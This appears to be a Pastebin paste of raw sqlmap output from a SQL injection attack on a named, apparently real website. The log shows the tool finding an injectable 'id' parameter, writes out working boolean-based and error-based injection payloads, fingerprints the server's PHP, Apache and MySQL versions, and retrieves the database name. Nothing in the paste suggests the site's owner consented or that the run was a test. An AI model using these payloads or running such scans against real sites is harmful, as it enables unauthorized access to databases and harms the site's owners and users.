Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- [04:19:03] [INFO] testing connection to the target URL
- [04:19:07] [INFO] heuristics detected web page charset 'ascii'
- [04:19:07] [INFO] checking if the target is protected by some kind of WAF/IPS/ID
- S
- [04:19:07] [INFO] testing if the target URL is stable
- [04:19:07] [INFO] target URL is stable
- [04:19:07] [INFO] testing if GET parameter 'id' is dynamic
- [04:19:08] [WARNING] GET parameter 'id' does not appear dynamic
- [04:19:08] [INFO] heuristic (basic) test shows that GET parameter 'id' might be
- injectable (possible DBMS: 'MySQL')
- [04:19:09] [INFO] testing for SQL injection on GET parameter 'id'
- it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads sp
- ecific for other DBMSes? [Y/n]
- for the remaining tests, do you want to include all tests for 'MySQL' extending
- provided level (1) and risk (1) values? [Y/n]
- [04:19:13] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
- [04:19:14] [WARNING] reflective value(s) found and filtering out
- [04:19:18] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MyS
- QL comment)'
- [04:20:01] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQ
- L comment)'
- [04:22:09] [CRITICAL] connection dropped or unknown HTTP status code received. T
- ry to force the HTTP User-Agent header with option '--user-agent' or switch '--r
- andom-agent'. sqlmap is going to retry the request(s)
- [04:22:10] [INFO] GET parameter 'id' seems to be 'OR boolean-based blind - WHERE
- or HAVING clause (MySQL comment)' injectable
- [04:22:10] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER B
- Y or GROUP BY clause'
- [04:22:11] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY
- or GROUP BY clause'
- [04:22:11] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER B
- Y or GROUP BY clause (EXTRACTVALUE)'
- [04:22:12] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY
- or GROUP BY clause (EXTRACTVALUE)'
- [04:22:12] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER B
- Y or GROUP BY clause (UPDATEXML)'
- [04:22:13] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY
- or GROUP BY clause (UPDATEXML)'
- [04:22:13] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER B
- Y or GROUP BY clause (EXP)'
- [04:22:13] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING clause (E
- XP)'
- [04:22:14] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER B
- Y or GROUP BY clause (BIGINT UNSIGNED)'
- [04:22:14] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING clause (B
- IGINT UNSIGNED)'
- [04:23:34] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER B
- Y or GROUP BY clause'
- [04:23:35] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE, HAVING clause'
- [04:23:35] [INFO] GET parameter 'id' is 'MySQL >= 4.1 OR error-based - WHERE, HA
- VING clause' injectable
- [04:23:35] [INFO] testing 'MySQL inline queries'
- [04:23:36] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
- [04:23:36] [CRITICAL] considerable lagging has been detected in connection respo
- nse(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or
- more)
- [04:23:36] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT)'
- [04:23:37] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
- [04:23:39] [INFO] testing 'MySQL > 5.0.11 stacked queries'
- [04:23:39] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment
- )'
- [04:23:41] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
- [04:23:41] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
- [04:23:42] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SELECT)'
- [04:23:44] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT - commen
- t)'
- [04:23:44] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SELECT - comment
- )'
- [04:23:45] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
- [04:23:46] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind'
- [04:23:46] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (comment)'
- [04:23:47] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (comment)'
- [04:23:48] [INFO] testing 'MySQL <= 5.0.11 AND time-based blind (heavy query)'
- [04:23:59] [INFO] testing 'MySQL <= 5.0.11 OR time-based blind (heavy query)'
- [04:24:10] [INFO] testing 'MySQL <= 5.0.11 AND time-based blind (heavy query - c
- omment)'
- [04:24:22] [INFO] testing 'MySQL <= 5.0.11 OR time-based blind (heavy query - co
- mment)'
- [04:24:33] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (SELECT)'
- [04:24:34] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (SELECT - comm
- ent)'
- [04:24:35] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'
- [04:24:36] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (comment)'
- [04:24:36] [INFO] testing 'MySQL AND time-based blind (ELT)'
- [04:24:37] [INFO] testing 'MySQL OR time-based blind (ELT)'
- [04:24:38] [INFO] testing 'MySQL AND time-based blind (ELT - comment)'
- [04:24:38] [INFO] testing 'MySQL OR time-based blind (ELT - comment)'
- [04:24:39] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query) - PROCEDU
- RE ANALYSE (EXTRACTVALUE)'
- [04:24:42] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query - comment)
- - PROCEDURE ANALYSE (EXTRACTVALUE)'
- [04:24:42] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace'
- [04:24:43] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace
- (SELECT)'
- [04:24:44] [INFO] testing 'MySQL <= 5.0.11 time-based blind - Parameter replace
- (heavy queries)'
- [04:24:45] [INFO] testing 'MySQL time-based blind - Parameter replace (bool)'
- [04:24:45] [INFO] testing 'MySQL time-based blind - Parameter replace (ELT)'
- [04:24:46] [INFO] testing 'MySQL time-based blind - Parameter replace (MAKE_SET)
- '
- [04:24:47] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
- [04:24:47] [INFO] automatically extending ranges for UNION query injection techn
- ique tests as there is at least one other (potential) technique found
- [04:24:57] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
- [04:25:07] [INFO] testing 'MySQL UNION query (random number) - 1 to 20 columns'
- [04:25:18] [INFO] testing 'MySQL UNION query (NULL) - 22 to 40 columns'
- [04:25:27] [INFO] testing 'MySQL UNION query (random number) - 22 to 40 columns'
- [04:25:37] [INFO] testing 'MySQL UNION query (NULL) - 42 to 60 columns'
- [04:25:48] [INFO] testing 'MySQL UNION query (random number) - 42 to 60 columns'
- [04:25:59] [INFO] testing 'MySQL UNION query (NULL) - 62 to 80 columns'
- [04:26:14] [INFO] testing 'MySQL UNION query (random number) - 62 to 80 columns'
- [04:26:25] [INFO] testing 'MySQL UNION query (NULL) - 82 to 100 columns'
- [04:26:36] [INFO] testing 'MySQL UNION query (random number) - 82 to 100 columns
- '
- [04:26:46] [WARNING] in OR boolean-based injections, please consider usage of sw
- itch '--drop-set-cookie' if you experience any problems during data retrieval
- GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any
- )? [y/N]
- sqlmap identified the following injection point(s) with a total of 369 HTTP(s) r
- equests:
- ---
- Parameter: id (GET)
- Type: boolean-based blind
- Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
- Payload: id=-9416 OR 2004=2004#
- Type: error-based
- Title: MySQL >= 4.1 OR error-based - WHERE, HAVING clause
- Payload: id=140 OR ROW(3844,2686)>(SELECT COUNT(*),CONCAT(0x716b717a71,(SELE
- CT (ELT(3844=3844,1))),0x7171626a71,FLOOR(RAND(0)*2))x FROM (SELECT 5054 UNION S
- ELECT 2242 UNION SELECT 7306 UNION SELECT 8307)a GROUP BY x)
- ---
- [04:26:57] [INFO] the back-end DBMS is MySQL
- web application technology: PHP 4.3.9, Apache 2.0.52
- back-end DBMS: MySQL 4.1
- [04:26:57] [WARNING] information_schema not available, back-end DBMS is MySQL <
- 5. database names will be fetched from 'mysql' database
- [04:26:59] [WARNING] the SQL query provided does not return any output
- [04:26:59] [WARNING] in case of continuous data retrieval problems you are advis
- ed to try a switch '--no-cast' or switch '--hex'
- [04:26:59] [INFO] fetching number of databases
- [04:26:59] [WARNING] running in a single-thread mode. Please consider usage of o
- ption '--threads' for faster data retrieval
- [04:26:59] [INFO] retrieved:
- [04:27:01] [ERROR] unable to retrieve the number of databases
- [04:27:01] [INFO] falling back to current database
- [04:27:01] [INFO] fetching current database
- [04:27:02] [INFO] retrieved: magicwings2010bs
- available databases [1]:
- [*] magicwings2010bs
- [04:27:02] [INFO] fetched data logged to text files under 'C:\Documents and Sett
- ings\root\.sqlmap\output\www.magicwings.com'
- [*] shutting down at 04:27:02
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement